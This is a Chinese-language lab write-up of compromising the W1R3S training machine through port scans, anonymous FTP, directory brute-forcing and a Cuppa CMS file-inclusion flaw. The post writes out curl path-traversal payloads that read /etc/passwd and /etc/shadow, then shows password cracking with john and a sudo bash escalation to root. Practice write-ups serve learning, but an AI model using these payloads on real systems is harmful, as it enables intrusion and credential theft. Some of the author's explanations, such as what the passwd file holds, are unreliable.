03_w1r3s靶机渗透完整流程与思路整理（信息收集，目录猜解，密码破解） ...

首先信息收集对收集的信息进行好的记录与分析，目录爆破发现文件管理，访问目录，尝试操作，分析cms的漏洞，目录猜解，查看文件利用curl编码解决报错,可以查看到passwd文件然后尝试查看shadow文件，利用john进行密码破解，ssh远程登录，sudo -l查看当前用户都有哪些权限，查看后发现是all，直接创建新的bash或者sh(推荐bash好用真正的权限)随后就是root权限，该靶机的难度在于对目录的猜解
信息收集

nmap -sn 192.168.20.0/24  //扫描网段IP发现靶机

nmap --min-rate 10000 -p- 192.168.20.21  //扫描主机开放端口

nmap -sT -sC -sV -O -p22,21,80,3306 192.168.20.21  //扫描端口开放的服务

nmap --script=vuln -p21,22,80,3306 192.168.20.21  //默认脚本扫描，发现一个文件管理系统，并且有开放的ftp文件传输协议

分析协议的优先级，服务的优先级选择一个端口下手，以ftp先开始
尝试登录ftp使用匿名用户，匿名用户登录通常是不需要密码的

账户名anonymous，然后密码输入回车

登陆后救赎先就是查看匿名用户所拥有的文件列表使用ls命令进行查看，将查看的文件全部都保存到 自己的主机上
使用ls查看文件列表，使用cd切换目录使用mget命令将文件保存到本机的当前文件夹下

使用cat命令分别查看三个文件的内容是什么
在这里，第一个文件内容中他的命名方式有些奇怪，需要注意的一个点是他用的并不是正常的英文字母，而是采用了广泛的leetspeack进行了编码，这种方式是为了改变命名冲突的问题https://en.wikipedia.org/wiki/Leet

所以下面所显示的内容就是WIRES.inc

查看02.txt文件发现有两个字符出串，但是类似于加密

用hash-identifier这个去识别一下是哪种加密方式 hash-identifier 01ec2d8fc11c493b25029fb1f47f39ce

对第二个字符串进行识别，但是观察两个的格式肯定是不一样的，猜测第二个是base64编码，进行解密，echo作用是防止发生断开

解密上面的md5的字符串但是没有实际结果

查看其他两个文件：

还有一个

但是文字是翻转的，用工具翻转

提示信息不要在这里做，记住信息

换其他的方向，因为ftp没有收集到可以用的信息
访问80端口，是一个默认的界面，但是上面提示有文件系统，所以这里可能有其他的信息

尝试进行目录爆破
gobuster dir -u http://192.168.20.21 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

但是结果只有这一个看以看，经过一顿思考操作这个没什么用，但是还是要记笔记收集起来万一后面会用到的

既然是cms那就搜一下这个cms有没有什么漏洞
使用kali默认的工具，可以看到是有的：searchsploit cuppa cms

把这个文件加载到本机当前的路径，查看文件的详细内容
searchsploit cuppa cms -m 25971



可以看到两个路径，浏览器尝试访问，可以看到有显示信息
说明一下，url路径问题，大多数情况下在网站之中都不会将文件放在他的最初的默认下面，比如不太会放在cuppa下面，所以尝试访问的时候去找我们已经访问到的路径进行拼接，从低级目录到高级目录的拼接，所以会成为下面这样可以访问

路径访问既然有显示，接下来就是我们要看到这个文件的里面是什么内容，使用curl去解码
html2text是为了是使结果展现的更清晰，根据情况使用，没有html2text可以根据报错提示直接下载
可以到这个文件是可以成功访问的
curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.20.21/administrator/alerts/alertConfigField.php | html2text

信息分析

既然我们刚刚访问到了passwd这个文件，那么就可以尝试访问一下shadow文件，这两个文件的区别在于前者是每个用户都可以看的，存放的也只是普通用户的密码，但是shadow这个文件下面所存放的是系统用户的信息，是否能访问看网站的安全性
可以看到执行命令后出现两个很长的加密密码，这就是需要进行破解的地方（部分图片）
curl --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.20.21/administrator/alerts/alertConfigField.php


接下来破解这两个密码，把这两个密码复制，使用vim编辑器生成文件hash（随意）
john hash
这个截图是因为已经破解过了，看提示展示某个文件就行

可以看到两个密码一个是computer的一个是www-data的，肯定是用计算机的去尝试ssh登录了（前面的是用户名后面的是密码，这是靶机真实情况万一有，俩都试试，但是先试一个，看看有没有什么特权，而不是试试能不能登录）
john --show hash

提权

登录成功，初级shell拿到，接下来就是提权

查看当前用户信息

查看当前用户sudo的权限是什么样的
sudo -l  //标记位置为所有权限，那就是这个用户可以直接提权到root

使用sudo /bin/bash 或者 sudo /bin/sh都可以执行此处的提权，本意就是创建一个新的进程？然后将这个权限是执行的sudo,又因为当前的这个用户是ALL权限，所以直接是root(我也有点这个原理上的疑惑，求证后会更改)_


最后切换到root下，截一张大图这里


免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！